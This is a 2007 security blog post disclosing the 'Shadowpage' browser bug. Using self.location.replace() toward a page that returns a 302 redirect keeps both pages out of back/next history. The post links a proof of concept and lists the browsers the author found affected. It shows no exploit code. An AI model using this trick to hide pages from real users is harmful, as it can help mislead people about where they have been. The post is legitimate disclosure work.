ush.it - a beautiful place

Shadowpage vulnerability: the page that doesn't exists (Multiple browsers affected)

May 7, 2007 at 12:15 pm - Filed under Hacks, Language EN - 179 words, reading time ~0 minutes - Permalink - Comments

Yesterday I (Francesco `ascii` Ongaro) found a low impact bug: basically it is possible to make the user visit a page that is not listed in the back/next button history. The fun happens when self.location.replace() is pointing to a page that issues an HTTP/1.x 302 Redirect + Location. Both initial and redirect page will not be listed.

Since the bug is really trivial I feel that this amount of information plus a PoC is enough to put everybody in conditions of fully understand the bug.

PoC: http://ascii.ush.it/hack-shadowpage/

Initially I believed that it was just a Mozilla Firefox bug but when I tested the PoC on other browsers it worked flawlessly. So again: it's not remote code execution but works on every browser I tried, and this makes it kinda cool.

Mozilla Firefox 1.5.0.11              (works)
Mozilla Firefox 2.0.0.3               (works)
GNOME Web Browser 2.16.2/Epiphany     (works)
Opera 9.20                            (works)
Microsoft Internet Explorer 7         (works)
Microsoft Internet Explorer 6         (works)
Microsoft Internet Explorer 5.5       (works)
Microsoft Internet Explorer 5         (works)
Konqueror 3.5.2                       (works)
Safari 2.0.4 (419.3)                  (works)
Reed's Alert! Got something burning? Tell USH team.
THP USH Wisec DigitalBullets